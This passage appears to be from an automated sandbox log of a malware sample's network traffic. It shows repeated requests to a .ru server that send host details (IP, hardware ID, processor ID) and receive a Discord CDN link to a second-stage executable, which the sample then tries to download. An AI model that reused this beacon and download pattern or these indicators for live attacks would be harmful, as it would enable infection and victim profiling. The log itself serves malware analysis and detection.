                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vdDAFXg9LsZnLUmLMY793HBjLdzX9AEQi1LF82pydyeGORs166X09dte%2F5Pee2TDqr%2Bixauxj3iiMX6ak6oq0cvuO72y9D2LNic8yRIPorPxnXAzgdJ%2F9sF7Hqw5Jvf1biiDN5fq"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c6e78e2313b9-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:35 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:30:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    57192.168.2.649778104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:34 UTC86OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:35 UTC595INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:35 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Oyqg432JGAcQzaLaChK2RgpEj6uIWJvjI4%2BbBqBUCY1THUkxy322BXwfEueBO0OdaykxAUkg6iS1p2H85i34BVTAzQb5ABLKDJEUvDQMqiUN0mcgInZoHNZ5Zgk4rVIibovxFJ9t"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c6e9bb3c07d5-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:35 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:30:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    58192.168.2.649779104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:35 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:30:36 UTC611INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:35 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZNuV76Ls4oKD%2BnsGZsBnVSo0EkXrfRIMHEoTnz3%2B%2FIwPsSVNlcvsQGM00HFcw%2Bjx6u704V92RLpZNC55t%2FEX4CdLpOOmo3Dj6%2Biv9Dune%2Bl%2B6O6k76ykIOXFYWkhzVkWv9%2FJA3xD"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c6ebeb8a8232-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:36 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:30:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    59192.168.2.649780162.159.129.2334433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:35 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:35 UTC1333INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:30:35 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c6edfc73393e-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 10
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:30:35 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPqOIGAzj-dl_AWpE-LsBDYDlVOVkAcgC9G1wrcrN3p-tot3JhzRYuEor72QuuG9QSCFt8s
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=mAAcljvMvhguJ5.zZvv8TEJ0xL27gWdTZt5HJ9VjqJw-1704353435-1-AYwZQsOX3P86AImcq8JY6t7b+N+DTxqhWACZqndZR7uZ/56HdGSPVZ8DLGJ2JrFqp310PipUMoRr393AquEZrxM=; path=/; expires=Thu, 04-Jan-24 08:00:35 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SGNiFbmXmGjHeQnsACDSFajEFhooHaywbk34RKhc7nuG3cptv%2BvVHviFNh%2F3xue4ueJodO8vspfC1gyQsHBa8A3SQ%2BvWgAookJeaO0HBLsEw59WvoMA4WtB1zQMfhQRjdbEykA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=jWEuyt3_nxh_A_zQpQRJQm.mZzUyIkNV8SXBDRVEpJw-1704353435854-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:30:35 UTC36INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27
                                                                                    Data Ascii: <?xml version='1.0' encoding='UTF-8'
                                                                                    2024-01-04 07:30:35 UTC200INData Raw: 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: ?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    60192.168.2.649781104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:36 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:36 UTC580INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:36 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YWqic0yguYvZbmwIJCFcUHfHjDXtJxAi1%2B35HHnFoVBsZ1RyQddnIBPSMLh6RzyGa0sIWV6fFtV%2Fdt8h40ZOUv9ZozM0MMersvpizFmBE%2F%2F1ozszBisNvlHMnCVWy%2FtuCMxVHu9B"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c6f18ae59c2a-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:36 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:30:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    61192.168.2.649782162.159.129.23344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:36 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:36 UTC1337INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:30:36 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c6f1997f05ca-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 20
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:30:36 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPpnDEXM9ZU-YXeyr-01FXF-iSbsKGRr8QoLoQnbp3S9RQtXPnw6PpkDhWLrWXESBz_nnE8
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=pgJWlPDiUahkAuxdYvzTUFCjPFP9nE6fs7c8sEMm0yo-1704353436-1-ARZQOnUIpDzVdTSRojPTE/LgBAsa+XQ7EoFxtfW+/WY0U+sDUHHmtlGDhnVbjBzdpzzG7JS5nkY1jbaKXfEke1Q=; path=/; expires=Thu, 04-Jan-24 08:00:36 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VAyHtMgaIX4xK0tkmjxDjAJDDsL2PbEv9uZl8qyz2r4NqFEQreoUxfsL7JUOGnlKtejNBG8gCNp%2FGdzxt8D%2BP%2F3ZOLB1gscK%2BRTiCfwi%2FbwUhgOwT9X0WJZBPyWyxdAkkqt1IQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=ciNRJFEkxm0IT2MsII93gp2ZT.Dj20DoFtb_3Xk.OdI-1704353436436-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:30:36 UTC32INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54
                                                                                    Data Ascii: <?xml version='1.0' encoding='UT
                                                                                    2024-01-04 07:30:36 UTC204INData Raw: 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: F-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    62192.168.2.649783104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:36 UTC165OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:30:37 UTC584INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:37 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mFTyHUbVm%2FUudFdFZPAHeao5DqvnHKrMToqceEXDJPupDgwyS7O5XWNqyEKNo4sVloTUP%2Fd0DstCzM%2BJWxmrpgRKTV%2FzQDWaEO8%2BNXBVJ7bY8qinv%2BOn4a%2BDjvclSE9jnG0yRp4Y"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c6f51f733b8f-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:37 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:30:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    63192.168.2.649784104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:37 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:30:37 UTC605INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:37 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zQz05UD8fbtryzoZM%2F6qnw3Kx%2FCksJddxmUG45zisgfVpd4B%2FL4hM8RziobXTkTggPh9NBqjMfAHJ%2FbWVIphhZgFSzNrTOjs4XfM77avRop3T%2FGW3UO%2BMNFqb4h8WrhhaKrTOblY"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c6f74b4257a9-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:37 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:30:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    64192.168.2.649785104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:37 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:30:38 UTC599INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:38 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Lrmwt0iu8zhOpvBqyJfVU2%2FqgirgGDmcivC2n2ZtkkESjX5ubPBiqYE7EY64kHP%2B9Te2FVKmYg5W1XexVAYi8gfIplEVs7suAyjAY4MQ6arOpih%2BbH2g05lbl8FAQcfq79n1YNEp"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c6f97e192072-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:38 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:30:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    65192.168.2.649786162.159.129.2334433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:38 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:38 UTC1335INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:30:38 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c6fccfe139b2-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 13
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:30:38 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPqOIGAzj-dl_AWpE-LsBDYDlVOVkAcgC9G1wrcrN3p-tot3JhzRYuEor72QuuG9QSCFt8s
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=5QcQtROf_C5fGbeF1m5qJ3B2UCaw89FCfs5agePWC6A-1704353438-1-AZH/KEFoXuNfxDGpgXE3/8TKrRxKH0Yw3Z2Coy8DjUNq5105GfdjonPXv+ozhECKWkxEPaTP3GDnEXdFHL5gUgQ=; path=/; expires=Thu, 04-Jan-24 08:00:38 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xkImevqV%2BIM2OybM8X8mN39SyiVCIj%2BtQuHqXaVM62qwMWi6oG8dYCBIKw4OY971zDnDjBfPOGTzd7w9N7khcJwHkWf75NnBI%2FOp8oVcpCi3r5YvVFstJiENhtk3MSQiLAa%2FZA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=bAOiUxafqA0ymSwJcCO5pRrLCvadu7_Ph8XTrumgPQg-1704353438267-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:30:38 UTC34INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d
                                                                                    Data Ascii: <?xml version='1.0' encoding='UTF-
                                                                                    2024-01-04 07:30:38 UTC202INData Raw: 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: 8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    66192.168.2.649787162.159.129.23344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:38 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:38 UTC1334INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:30:38 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c6ff0af25776-IAD
                                                                                    CF-Cache-Status: MISS
                                                                                    Accept-Ranges: bytes
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:30:38 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPqURQ2RkFvfQOod70WCLX2ErgeFYAiUncDxuJocma8vmDwPeeQBu9xIipew02g4qpq12Sby-B46mw
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=0AzAPLlSIh6dxJ_6zl4scfdA6d_oj7hk0xPd9_B6CWY-1704353438-1-AUL4cXn1Lm3i/58Dew4rRga2VYiWKmsIhlA6Fv280tGjBpyeLslTQzHH3tYpoRWuy+XSoKvFOhoXbKd/gnHCy0k=; path=/; expires=Thu, 04-Jan-24 08:00:38 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=11gf6VOow1wU3x6utQH2UJn%2FeHexXy5YHxdQkis3y8KxeD3RNdALxrlwUz40XNzDuCpYC%2Bp%2BqFmzRtt7adTwBE%2BNMUFOAQ5kW9dWHDcPKGCvEz7afNi7ys1K72blJnsKlcHHww%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=ohNxywSEem63aXIZKw0hBPwxn.d.0HXnx91A3Ucn8Pw-1704353438622-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:30:38 UTC35INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38
                                                                                    Data Ascii: <?xml version='1.0' encoding='UTF-8
                                                                                    2024-01-04 07:30:38 UTC201INData Raw: 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: '?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    67192.168.2.649788104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:38 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:39 UTC574INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:39 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
